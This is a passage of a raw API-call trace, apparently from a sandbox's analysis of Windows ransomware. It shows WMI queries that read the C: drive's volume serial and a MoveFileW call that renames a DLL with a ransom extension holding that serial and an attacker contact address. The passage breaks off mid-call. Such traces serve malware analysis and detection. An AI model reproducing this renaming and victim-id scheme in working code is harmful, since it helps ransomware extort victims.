WbemDefPath:IWbemPath:GetInfo (in: This=0x60258b0, uRequestedInfo=0x0, puResponse=0x6d8eda4 | out: puResponse=0x6d8eda4*=0xc19) returned 0x0 [0144.718] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60258b0, puCount=0x6d8ed1c | out: puCount=0x6d8ed1c*=0x0) returned 0x0 [0144.718] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6d8ed08 | out: puCount=0x6d8ed08*=0x2) returned 0x0 [0144.718] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ed04*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed04*=0xf, pszText=0x0) returned 0x0 [0144.718] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ed04*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ed04*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0144.718] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ecb8 | out: ppv=0x6d8ecb8*=0xb51e34) returned 0x0 [0144.718] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ecb0 | out: pAptType=0x6d8ecb0*=1) returned 0x0 [0144.718] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ecb4 | out: ppvObject=0x6d8ecb4*=0x0) returned 0x80004002 [0144.718] IUnknown:Release (This=0xb51e34) returned 0x1 [0144.719] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e620 | out: ppv=0x6d8e620*=0x60248f0) returned 0x0 [0144.719] WbemDefPath:IUnknown:QueryInterface (in: This=0x60248f0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e838 | out: ppvObject=0x6d8e838*=0x0) returned 0x80004002 [0144.719] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60248f0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e84c | out: ppvObject=0x6d8e84c*=0x6025840) returned 0x0 [0144.719] WbemDefPath:IUnknown:Release (This=0x60248f0) returned 0x0 [0144.719] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025840, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e46c | out: ppvObject=0x6d8e46c*=0x6025840) returned 0x0 [0144.720] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025840, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e428 | out: ppvObject=0x6d8e428*=0x0) returned 0x80004002 [0144.720] WbemDefPath:IUnknown:AddRef (This=0x6025840) returned 0x3 [0144.720] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025840, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8dd84 | out: ppvObject=0x6d8dd84*=0x0) returned 0x80004002 [0144.720] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025840, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dd34 | out: ppvObject=0x6d8dd34*=0x0) returned 0x80004002 [0144.720] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025840, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dd40 | out: ppvObject=0x6d8dd40*=0xbe2610) returned 0x0 [0144.720] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2610, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8dd48 | out: pCid=0x6d8dd48*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0144.720] WbemDefPath:IUnknown:Release (This=0xbe2610) returned 0x3 [0144.720] CoGetContextToken (in: pToken=0x6d8dda0 | out: pToken=0x6d8dda0) returned 0x0 [0144.720] CoGetContextToken (in: pToken=0x6d8e1a8 | out: pToken=0x6d8e1a8) returned 0x0 [0144.720] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025840, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e238 | out: ppvObject=0x6d8e238*=0x0) returned 0x80004002 [0144.720] WbemDefPath:IUnknown:Release (This=0x6025840) returned 0x2 [0144.721] WbemDefPath:IUnknown:Release (This=0x6025840) returned 0x1 [0144.721] CoGetContextToken (in: pToken=0x6d8eb30 | out: pToken=0x6d8eb30) returned 0x0 [0144.721] CoGetContextToken (in: pToken=0x6d8ea90 | out: pToken=0x6d8ea90) returned 0x0 [0144.721] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025840, riid=0x6d8eb60*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8eb5c | out: ppvObject=0x6d8eb5c*=0x6025840) returned 0x0 [0144.721] WbemDefPath:IUnknown:AddRef (This=0x6025840) returned 0x3 [0144.721] WbemDefPath:IUnknown:Release (This=0x6025840) returned 0x2 [0144.721] WbemDefPath:IWbemPath:SetText (This=0x6025840, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0144.721] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025840, puCount=0x6d8ece0 | out: puCount=0x6d8ece0*=0x2) returned 0x0 [0144.721] WbemDefPath:IWbemPath:GetText (in: This=0x6025840, lFlags=4, puBuffLength=0x6d8ecdc*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecdc*=0xf, pszText=0x0) returned 0x0 [0144.721] WbemDefPath:IWbemPath:GetText (in: This=0x6025840, lFlags=4, puBuffLength=0x6d8ecdc*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecdc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0144.721] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ece0 | out: ppv=0x6d8ece0*=0xb51e34) returned 0x0 [0144.721] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ecd8 | out: pAptType=0x6d8ecd8*=1) returned 0x0 [0144.721] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ecdc | out: ppvObject=0x6d8ecdc*=0x0) returned 0x80004002 [0144.721] IUnknown:Release (This=0xb51e34) returned 0x1 [0144.722] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e900 | out: ppv=0x6d8e900*=0x602b2b8) returned 0x0 [0144.722] WbemLocator:IUnknown:QueryInterface (in: This=0x602b2b8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8eb18 | out: ppvObject=0x6d8eb18*=0x0) returned 0x80004002 [0144.722] WbemLocator:IClassFactory:CreateInstance (in: This=0x602b2b8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8eb2c | out: ppvObject=0x6d8eb2c*=0x60248e0) returned 0x0 [0144.722] WbemLocator:IUnknown:Release (This=0x602b2b8) returned 0x0 [0144.722] WbemLocator:IUnknown:QueryInterface (in: This=0x60248e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e74c | out: ppvObject=0x6d8e74c*=0x60248e0) returned 0x0 [0144.722] WbemLocator:IUnknown:QueryInterface (in: This=0x60248e0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e708 | out: ppvObject=0x6d8e708*=0x0) returned 0x80004002 [0144.722] WbemLocator:IUnknown:AddRef (This=0x60248e0) returned 0x3 [0144.722] WbemLocator:IUnknown:QueryInterface (in: This=0x60248e0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8e064 | out: ppvObject=0x6d8e064*=0x0) returned 0x80004002 [0144.723] WbemLocator:IUnknown:QueryInterface (in: This=0x60248e0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8e014 | out: ppvObject=0x6d8e014*=0x0) returned 0x80004002 [0144.723] WbemLocator:IUnknown:QueryInterface (in: This=0x60248e0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e020 | out: ppvObject=0x6d8e020*=0x0) returned 0x80004002 [0144.723] CoGetContextToken (in: pToken=0x6d8e080 | out: pToken=0x6d8e080) returned 0x0 [0144.723] CoGetContextToken (in: pToken=0x6d8e488 | out: pToken=0x6d8e488) returned 0x0 [0144.723] WbemLocator:IUnknown:QueryInterface (in: This=0x60248e0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e518 | out: ppvObject=0x6d8e518*=0x0) returned 0x80004002 [0144.947] WbemLocator:IUnknown:Release (This=0x60248e0) returned 0x2 [0144.952] WbemLocator:IUnknown:Release (This=0x60248e0) returned 0x1 [0144.954] CoGetContextToken (in: pToken=0x6d8eaf8 | out: pToken=0x6d8eaf8) returned 0x0 [0144.959] CoGetContextToken (in: pToken=0x6d8ea58 | out: pToken=0x6d8ea58) returned 0x0 [0144.973] WbemLocator:IUnknown:QueryInterface (in: This=0x60248e0, riid=0x6d8eb28*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6d8eb24 | out: ppvObject=0x6d8eb24*=0x60248e0) returned 0x0 [0144.988] WbemLocator:IUnknown:AddRef (This=0x60248e0) returned 0x3 [0144.994] WbemLocator:IUnknown:Release (This=0x60248e0) returned 0x2 [0144.994] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025840, puCount=0x6d8ecbc | out: puCount=0x6d8ecbc*=0x2) returned 0x0 [0144.994] WbemDefPath:IWbemPath:GetText (in: This=0x6025840, lFlags=8, puBuffLength=0x6d8ecb8*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecb8*=0xf, pszText=0x0) returned 0x0 [0144.994] WbemDefPath:IWbemPath:GetText (in: This=0x6025840, lFlags=8, puBuffLength=0x6d8ecb8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecb8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0144.994] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6d8eb94 | out: ppv=0x6d8eb94*=0x6024940) returned 0x0 [0144.994] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6024940, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6d8ec28 | out: ppNamespace=0x6d8ec28*=0x601089c) returned 0x0 [0146.883] WbemLocator:IUnknown:QueryInterface (in: This=0x601089c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8eac4 | out: ppvObject=0x6d8eac4*=0xb5aaa4) returned 0x0 [0146.883] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5aaa4, pProxy=0x601089c, pAuthnSvc=0x6d8eb14, pAuthzSvc=0x6d8eb10, pServerPrincName=0x6d8eb08, pAuthnLevel=0x6d8eb0c, pImpLevel=0x6d8eafc, pAuthInfo=0x6d8eb00, pCapabilites=0x6d8eb04 | out: pAuthnSvc=0x6d8eb14*=0xa, pAuthzSvc=0x6d8eb10*=0x0, pServerPrincName=0x6d8eb08, pAuthnLevel=0x6d8eb0c*=0x6, pImpLevel=0x6d8eafc*=0x2, pAuthInfo=0x6d8eb00, pCapabilites=0x6d8eb04*=0x1) returned 0x0 [0146.883] WbemLocator:IUnknown:Release (This=0xb5aaa4) returned 0x1 [0146.883] WbemLocator:IUnknown:QueryInterface (in: This=0x601089c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8eab8 | out: ppvObject=0x6d8eab8*=0xb5aac4) returned 0x0 [0146.883] WbemLocator:IUnknown:QueryInterface (in: This=0x601089c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8eab4 | out: ppvObject=0x6d8eab4*=0xb5aaa4) returned 0x0 [0146.883] WbemLocator:IClientSecurity:SetBlanket (This=0xb5aaa4, pProxy=0x601089c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0146.884] WbemLocator:IUnknown:Release (This=0xb5aaa4) returned 0x2 [0146.884] WbemLocator:IUnknown:Release (This=0xb5aac4) returned 0x1 [0146.884] CoTaskMemFree (pv=0xbd4a38) [0146.884] WbemLocator:IUnknown:Release (This=0x6024940) returned 0x0 [0146.884] WbemLocator:IUnknown:QueryInterface (in: This=0x601089c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e6b4 | out: ppvObject=0x6d8e6b4*=0xb5aac4) returned 0x0 [0146.884] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aac4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e670 | out: ppvObject=0x6d8e670*=0x0) returned 0x80004002 [0146.886] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aac4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e48c | out: ppvObject=0x6d8e48c*=0x0) returned 0x80004002 [0147.067] WbemLocator:IUnknown:AddRef (This=0xb5aac4) returned 0x3 [0147.067] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aac4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8dfcc | out: ppvObject=0x6d8dfcc*=0x0) returned 0x80004002 [0147.067] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aac4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8df7c | out: ppvObject=0x6d8df7c*=0x0) returned 0x80004002 [0147.067] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aac4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8df88 | out: ppvObject=0x6d8df88*=0xb5aa24) returned 0x0 [0147.068] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5aa24, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8df90 | out: pCid=0x6d8df90*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0147.068] WbemLocator:IUnknown:Release (This=0xb5aa24) returned 0x3 [0147.068] CoGetContextToken (in: pToken=0x6d8dfe8 | out: pToken=0x6d8dfe8) returned 0x0 [0147.068] CoGetContextToken (in: pToken=0x6d8e3f0 | out: pToken=0x6d8e3f0) returned 0x0 [0147.068] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aac4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e480 | out: ppvObject=0x6d8e480*=0xb5aaac) returned 0x0 [0147.068] WbemLocator:IRpcOptions:Query (in: This=0xb5aaac, pPrx=0xb5aac4, dwProperty=2, pdwValue=0x6d8e4a8 | out: pdwValue=0x6d8e4a8) returned 0x80004002 [0147.068] WbemLocator:IUnknown:Release (This=0xb5aaac) returned 0x3 [0147.068] WbemLocator:IUnknown:Release (This=0xb5aac4) returned 0x2 [0147.068] CoGetContextToken (in: pToken=0x6d8e9c8 | out: pToken=0x6d8e9c8) returned 0x0 [0147.068] CoGetContextToken (in: pToken=0x6d8e928 | out: pToken=0x6d8e928) returned 0x0 [0147.068] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aac4, riid=0x6d8e9f8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6d8e9f4 | out: ppvObject=0x6d8e9f4*=0x601089c) returned 0x0 [0147.068] WbemLocator:IUnknown:AddRef (This=0x601089c) returned 0x4 [0147.068] WbemLocator:IUnknown:Release (This=0x601089c) returned 0x3 [0147.068] WbemLocator:IUnknown:Release (This=0x601089c) returned 0x2 [0147.068] SysStringLen (param_1=0x0) returned 0x0 [0147.068] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60258b0, puCount=0x6d8ed8c | out: puCount=0x6d8ed8c*=0x0) returned 0x0 [0147.068] WbemDefPath:IWbemPath:GetText (in: This=0x60258b0, lFlags=2, puBuffLength=0x6d8ed88*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed88*=0x20, pszText=0x0) returned 0x0 [0147.068] WbemDefPath:IWbemPath:GetText (in: This=0x60258b0, lFlags=2, puBuffLength=0x6d8ed88*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed88*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0147.068] CoGetContextToken (in: pToken=0x6d8e9f8 | out: pToken=0x6d8e9f8) returned 0x0 [0147.068] WbemLocator:IUnknown:AddRef (This=0xb5aac4) returned 0x3 [0147.069] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aac4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e88c | out: ppvObject=0x6d8e88c*=0xb5aac4) returned 0x0 [0147.069] WbemLocator:IUnknown:Release (This=0xb5aac4) returned 0x3 [0147.069] WbemLocator:IUnknown:Release (This=0xb5aac4) returned 0x2 [0147.069] WbemDefPath:IWbemPath:GetText (in: This=0x60258b0, lFlags=2, puBuffLength=0x6d8ed90*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed90*=0x20, pszText=0x0) returned 0x0 [0147.069] WbemDefPath:IWbemPath:GetText (in: This=0x60258b0, lFlags=2, puBuffLength=0x6d8ed90*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed90*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0147.069] IWbemServices:GetObject (in: This=0x601089c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6d8ed44*=0x0, ppCallResult=0x0 | out: ppObject=0x6d8ed44*=0x6027cb8, ppCallResult=0x0) returned 0x0 [0147.287] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025840, puCount=0x6d8ed44 | out: puCount=0x6d8ed44*=0x2) returned 0x0 [0147.287] WbemDefPath:IWbemPath:GetText (in: This=0x6025840, lFlags=4, puBuffLength=0x6d8ed40*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed40*=0xf, pszText=0x0) returned 0x0 [0147.287] WbemDefPath:IWbemPath:GetText (in: This=0x6025840, lFlags=4, puBuffLength=0x6d8ed40*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ed40*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0147.287] IWbemClassObject:Get (in: This=0x6027cb8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ed40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x373bc54*=0, plFlavor=0x373bc58*=0 | out: pVal=0x6d8ed40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x373bc54*=8, plFlavor=0x373bc58*=0) returned 0x0 [0147.287] SysStringByteLen (bstr="9C354B42") returned 0x10 [0147.287] SysStringByteLen (bstr="9C354B42") returned 0x10 [0147.287] IWbemClassObject:Get (in: This=0x6027cb8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ed48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x373bc54*=8, plFlavor=0x373bc58*=0 | out: pVal=0x6d8ed48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x373bc54*=8, plFlavor=0x373bc58*=0) returned 0x0 [0147.287] SysStringByteLen (bstr="9C354B42") returned 0x10 [0147.287] SysStringByteLen (bstr="9C354B42") returned 0x10 [0147.287] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", nBufferLength=0x105, lpBuffer=0x6d8e948, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", lpFilePart=0x0) returned 0x33 [0147.287] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6d8e948, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x56 [0147.287] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8eda8) returned 1 [0147.287] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll"), fInfoLevelId=0x0, lpFileInformation=0x6d8ee24 | out: lpFileInformation=0x6d8ee24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x14516ce0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0147.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8eda4) returned 1 [0147.288] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll"), lpNewFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0147.288] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8eeec) returned 1 [0147.288] GetFullPathNameW (in: 